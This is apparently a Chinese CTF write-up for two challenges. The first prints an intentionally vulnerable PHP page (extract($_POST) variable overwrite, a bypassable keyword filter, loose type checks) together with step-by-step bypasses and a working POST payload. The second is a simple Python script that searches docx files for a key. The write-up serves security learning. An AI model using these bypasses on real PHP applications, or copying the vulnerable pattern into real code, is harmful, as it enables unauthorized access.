两个关卡

关卡1：

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
function filter($string){
        $filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
        $filter_phrase= '/'.implode('|',$filter_word).'/';
        return preg_replace($filter_phrase,'',$string);
    }
if($ppp){
    unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';
extract($_POST);
$num1 = filter($ppp['number1']);        
$num2 = filter($ppp['number2']);        
$num3 = filter($ppp['number3']);        
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);    
if(isset($num1) && is_numeric($num1)){
    die("非数字");
}
else{
    if($num1 > 1024){
    echo "第一层";
        if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
            echo "第二层";
            if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
                echo "第三层";
                if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
                    echo "第四层";
                    if(!isset($num5)||(strlen($num5)==0)) die("no");
                    $b=json_decode(@$num5);
                        if($y = $b === NULL){
                                if($y === true){
                                    echo "第五层";
                                    include 'KeY1lhv.php';
                                    echo $KEY1;
                                }
                        }else{
                            die("no");
                        }
                }else{
                    die("no");
                }
            }else{
                die("no");
            }
        }else{
            die("no");
        }
    }else{
        die("no111");
    }
}

一步一步绕过即可

1. if($num1 > 1024)，数字加字符串绕过
2. if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000)，科学计数法
3. if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7))，爆破出满足条件的md5
4. if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) )，使用0000000即可，但是由于过滤，需要先在中间插入num之类的敏感字符，然后经过filter替换，000num0000->0000000
5. $b=json_decode(@$num5);if($y = $b === NULL)，传入随便一串字符：qqqqqq，感觉不是预期内的做法。。。

payload:

ppp[number1]=1025aaa&ppp[number2]=1e6&ppp[number3]=61823470&ppp[number4]=000num0000&ppp[number5]=qqqqqq

关卡2：

写个脚本，一个一个搜就行了

from docx import Document
import os
import base64
for dirs, root, files in os.walk(r'D:\Download\five_month'):
    for file in files:
        if file.split('.')[-1]=='docx':
            p=os.path.join(dirs,file)
            d=Document(p)
            for para in d.paragraphs:
                try:
                    if 'KEY' in para.text:
                        print(para.text)
                except:
                    pass